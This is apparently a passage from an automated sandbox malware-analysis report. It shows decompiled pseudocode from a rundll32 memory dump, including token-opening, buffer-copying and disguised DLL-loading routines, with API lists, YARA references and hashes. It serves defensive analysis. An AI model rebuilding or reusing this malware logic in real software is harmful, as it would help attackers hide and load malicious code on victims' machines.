								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8508458b
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0x51ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E03476020(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0x51ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x5d08408b
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xee85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0xee85000
							E03477180(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E03475EE0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0xee85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































            0x03474166
            0x0347416b
            0x0347416f
            0x03474172
            0x03474172
            0x03474175
            0x0347417a
            0x0347417f
            0x03474182
            0x03474187
            0x0347418a
            0x03474190
            0x03474190
            0x0347419b
            0x0347419e
            0x034741a5
            0x034741aa
            0x00000000
            0x00000000
            0x034741b0
            0x034741b5
            0x034741b5
            0x034741ba
            0x034741c0
            0x034741ca
            0x034741cf
            0x034741d5
            0x034741f4
            0x034741f7
            0x03474202
            0x03474202
            0x03474202
            0x034741f9
            0x034741f9
            0x034741fb
            0x00000000
            0x034741fd
            0x034741fd
            0x034741fd
            0x034741fb
            0x0347420a
            0x0347420f
            0x03474214
            0x0347421a
            0x0347421e
            0x03474221
            0x03474224
            0x0347422a
            0x0347422f
            0x03474232
            0x03474238
            0x0347423d
            0x03474243
            0x03474249
            0x0347424e
            0x03474251
            0x03474256
            0x0347425a
            0x0347425e
            0x03474261
            0x03474264
            0x0347426d
            0x03474274
            0x03474277
            0x0347427a
            0x0347427f
            0x03474284
            0x03474287
            0x0347428a
            0x0347428a
            0x0347428e
            0x03474297
            0x0347429e
            0x034742a1
            0x034742a6
            0x034742ab
            0x034742ab
            0x034742ae
            0x034742b3
            0x00000000
            0x00000000
            0x034741d7
            0x034741d9
            0x034741e6
            0x00000000
            0x00000000
            0x034741e6
            0x034741d9
            0x00000000
            0x034741d5
            0x034742b9
            0x034742be
            0x034742c1
            0x034742c4
            0x0347436f
            0x0347436f
            0x034742ca
            0x034742ca
            0x034742ca
            0x034742cf
            0x034742f9
            0x034742fc
            0x034742fc
            0x03474301
            0x03474303
            0x03474305
            0x03474308
            0x0347430b
            0x03474313
            0x03474318
            0x03474318
            0x0347431e
            0x03474321
            0x03474324
            0x03474327
            0x03474329
            0x03474329
            0x0347432a
            0x0347432a
            0x03474327
            0x03474338
            0x0347433b
            0x0347433f
            0x03474344
            0x03474347
            0x0347434a
            0x0347434a
            0x0347434a
            0x0347434d
            0x0347434d
            0x03474350
            0x03474350
            0x034742d1
            0x034742d1
            0x034742e1
            0x034742e4
            0x034742e9
            0x034742e9
            0x034742ec
            0x034742ef
            0x034742f2
            0x034742f4
            0x034742f4
            0x03474353
            0x03474355
            0x03474358
            0x03474358
            0x0347435e
            0x03474362
            0x03474365
            0x03474367
            0x03474367
            0x03474378
            0x0347437a
            0x0347437a
            0x03474382
            0x03474390
            0x03474393
            0x03474395
            0x034743b5
            0x034743b5
            0x034743b8
            0x034743be
            0x034743bf
            0x034743c2
            0x034743c4
            0x034743c7
            0x034743ca
            0x034743cd
            0x034743d1
            0x034743d4
            0x034743d7
            0x034743da
            0x034743dc
            0x034743dc
            0x034743df
            0x034743e1
            0x034743e1
            0x034743e4
            0x034743e6
            0x034743e9
            0x034743f1
            0x034743f4
            0x034743f9
            0x034743f9
            0x034743ff
            0x03474402
            0x03474405
            0x03474407
            0x03474407
            0x03474408
            0x03474408
            0x03474413
            0x03474413
            0x03474413
            0x03474416
            0x03474419
            0x03474419
            0x0347441c
            0x0347441c
            0x034743df
            0x0347441f
            0x03474422
            0x03474425
            0x03474427
            0x0347442a
            0x0347442c
            0x0347442f
            0x03474432
            0x03474434
            0x03474437
            0x0347443f
            0x03474447
            0x0347444a
            0x0347444a
            0x0347444a
            0x0347444d
            0x0347444d
            0x0347444d
            0x03474450
            0x03474456
            0x03474458
            0x03474458
            0x0347445e
            0x03474464
            0x0347446d
            0x03474474
            0x03474476
            0x03474479
            0x03474479
            0x0347447c
            0x0347447c
            0x0347447f
            0x03474481
            0x03474484
            0x03474486
            0x034744a1
            0x034744a1
            0x034744a5
            0x034744a8
            0x034744ab
            0x034744ae
            0x034744c4
            0x034744c4
            0x034744c4
            0x034744b0
            0x034744b0
            0x034744b2
            0x034744b6
            0x034744b9
            0x00000000
            0x034744bb
            0x034744bb
            0x034744bd
            0x00000000
            0x034744bf
            0x034744bf
            0x034744bf
            0x034744bd
            0x034744b9
            0x034744c8
            0x034744cb
            0x034744d0
            0x034744da
            0x034744da
            0x034744da
            0x034744dd
            0x03474488
            0x03474488
            0x0347448a
            0x03474491
            0x03474491
            0x03474493
            0x03474495
            0x03474497
            0x0347449b
            0x0347449d
            0x0347449f
            0x00000000
            0x00000000
            0x0347449f
            0x0347449b
            0x0347448c
            0x0347448c
            0x0347448f
            0x00000000
            0x00000000
            0x0347448f
            0x0347448a
            0x034744e7
            0x034744e9
            0x034744e9
            0x034744f4
            0x03474397
            0x03474397
            0x0347439a
            0x00000000
            0x0347439c
            0x0347439c
            0x0347439e
            0x034743a2
            0x00000000
            0x034743a4
            0x034743a4
            0x034743a4
            0x034743a7
            0x00000000
            0x034743ab
            0x034743b4
            0x034743b4
            0x034743a7
            0x034743a2
            0x0347439a
            0x03474386
            0x0347438f
            0x0347438f

            APIs
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: memcpy
            • String ID:
            • API String ID: 3510742995-0
            • Opcode ID: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction ID: 7d600389852f5f6b880b2b0efc3327794c4bed16a6e48658cd2278bfa1b8f69b
            • Opcode Fuzzy Hash: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction Fuzzy Hash: 94D12A756007009FCB24CF6EC9C49AAB7E5FF88344B18896EE88ACB751D731E945CB58
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346C92F Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0346C92F(void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr _t13;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
					L4:
					_t10 = _v8;
				} else {
					if(GetLastError() != 0x3f0) {
						L3:
						_t10 = 0;
					} else {
						_t13 =  *0x347f8d0; // 0x50ff8c0
						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t10;
			}






            0x0346c94e
            0x0346c980
            0x0346c980
            0x0346c950
            0x0346c95b
            0x0346c97c
            0x0346c97c
            0x0346c95d
            0x0346c967
            0x0346c97a
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0346c97a
            0x0346c95b
            0x0346c985

            APIs
            • GetCurrentThread.KERNEL32 ref: 0346C942
            • OpenThreadToken.ADVAPI32(00000000,?,?,0346CA74,00000000,03460000), ref: 0346C949
            • GetLastError.KERNEL32(?,?,0346CA74,00000000,03460000), ref: 0346C950
            • OpenProcessToken.ADVAPI32(00000000,?,?,0346CA74,00000000,03460000), ref: 0346C975
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: OpenThreadToken$CurrentErrorLastProcess
            • String ID:
            • API String ID: 1515895013-0
            • Opcode ID: eff94c41e8ac848aae07c147d97b9b7714d0e0ea77e93e6cd6a03e79668b5c49
            • Instruction ID: e3c34b7029660f8a0c8e321b4f5739c962f422dbe7d6184fee95e072e3521c29
            • Opcode Fuzzy Hash: eff94c41e8ac848aae07c147d97b9b7714d0e0ea77e93e6cd6a03e79668b5c49
            • Instruction Fuzzy Hash: 5EF03A32A01245ABDB00EBB4D849FAA73ECFB08200F040491E682EB154D760E9088FA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346D309 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 89%
            			E0346D309(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x347f8d4; // 0x50ffc00
				_t1 = _t50 + 0x1898; // 0x0
				_t14 =  *_t1;
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E03469F85(_t50, 0xb9d);
					_t66 =  *0x347f8d4; // 0x50ffc00
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E03469FE4( &_v140, 0x40, L"%08x", E0346E34A(_t66 + 0xb0, E0346A5D0(_t66 + 0xb0), 0));
					_t20 =  *0x347f8d4; // 0x50ffc00
					_t7 = _t20 + 0xa8; // 0x1
					asm("sbb eax, eax");
					_t25 = E03469F85(_t67, ( ~( *_t7) & 0xfffffeb6) + 0xded);
					_t26 =  *0x347f8d4; // 0x50ffc00
					_t68 = E03469C50(_t26 + 0x1020);
					_v12 = _t68;
					E03468D9A( &_v8);
					_t32 =  *0x347f8d4; // 0x50ffc00
					_t34 = E03469C50(_t32 + 0x122a);
					 *0x347f9d4 = _t34;
					_t35 =  *0x347f8d0; // 0x50ff8c0
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x347c9d8,  &_v140, ".", L"dll", 0, 0x347c9d8, _t25, 0x347c9d8, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x347f9d4);
					 *0x347f9cc = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0346F08E(0x347cbc4, _t60);
					}
					 *0x347f9d0 = _t38;
					E03468DDF( &_v12, 0xfffffffe);
					E03468F63( &_v140, 0, 0x80);
					if( *0x347f9d0 != 0) {
						goto L10;
					} else {
						E03468DDF(0x347f9d4, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x347f9d0 == 0) {
						_t46 =  *0x347f908; // 0x50ffa00
						 *0x347f9d0 = _t46;
					}
					L10:
					return 1;
				}
			}

























            0x0346d309
            0x0346d309
            0x0346d309
            0x0346d30c
            0x0346d318
            0x0346d318
            0x0346d323
            0x0346d33f
            0x0346d344
            0x0346d34d
            0x0346d34f
            0x0346d357
            0x0346d378
            0x0346d37d
            0x0346d382
            0x0346d38a
            0x0346d397
            0x0346d3a5
            0x0346d3b6
            0x0346d3bc
            0x0346d3bf
            0x0346d3d6
            0x0346d3e2
            0x0346d3ea
            0x0346d3f1
            0x0346d3f7
            0x0346d403
            0x0346d409
            0x0346d410
            0x0346d423
            0x0346d412
            0x0346d412
            0x0346d415
            0x0346d41b
            0x0346d420
            0x0346d425
            0x0346d430
            0x0346d442
            0x0346d454
            0x00000000
            0x0346d456
            0x0346d45d
            0x00000000
            0x0346d463
            0x0346d464
            0x0346d464
            0x0346d46b
            0x0346d46d
            0x0346d472
            0x0346d472
            0x0346d477
            0x0346d47b
            0x0346d47b

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID: %08x$dll
            • API String ID: 1029625771-2963171978
            • Opcode ID: 84b1108da616e2af18c1c72ab2467538e7671a3eccef40bc907bc156df18f92c
            • Instruction ID: 22432126b7dc24d92953c538195bbfd94f5876e28c4938d380d74daa0604c79f
            • Opcode Fuzzy Hash: 84b1108da616e2af18c1c72ab2467538e7671a3eccef40bc907bc156df18f92c
            • Instruction Fuzzy Hash: 3C31B5B2A04204BFD710EF69DC45FAA73ECEB49214F18416BF005EF284DB749D488B69
            Uniqueness

            Uniqueness Score: -1.00%

            Function 034736D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55stringCOMMON
            Download Yara Rule
            C-Code - Quality: 47%
            			E034736D5(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E034735EE(_a4);
				 *_t32 = "msxml32.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E0346A5D0();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x347cf90;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x347cf90;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L03478995();
				return _t29 - _t22;
			}

















            0x034736d5
            0x034736e0
            0x034736e7
            0x034736ee
            0x034736f4
            0x034736fc
            0x034736fd
            0x034736ff
            0x03473704
            0x0347370c
            0x0347370c
            0x0347370f
            0x03473713
            0x03473706
            0x03473706
            0x0347370a
            0x0347370c
            0x00000000
            0x00000000
            0x0347370c
            0x0347370a
            0x0347371c
            0x03473725
            0x0347372a
            0x0347372d
            0x03473730
            0x03473733
            0x03473735
            0x03473735
            0x0347373b
            0x0347373e
            0x03473741
            0x03473744
            0x03473749
            0x0347374b
            0x0347374b
            0x03473751
            0x0347375d
            0x0347375f
            0x0347376b

            APIs
            • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 0347371C
            • _ftol2_sse.MSVCRT ref: 0347375F
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: _ftol2_sselstrlen
            • String ID: msxml32.dll
            • API String ID: 1292649733-2051705522
            • Opcode ID: 33b873b88df8ac9856f07ab6415bf08e214c7b60318bd7bef42870a04a719aac
            • Instruction ID: d8689bb73729a46f07181134a908cf05020234a8016986f5b36b4221cefb4148
            • Opcode Fuzzy Hash: 33b873b88df8ac9856f07ab6415bf08e214c7b60318bd7bef42870a04a719aac
            • Instruction Fuzzy Hash: 0311E57AA00349ABCF00EF69E8044DE7FB5FF84310F2685ABD854DE249EB30C5659789
            Uniqueness

            Uniqueness Score: -1.00%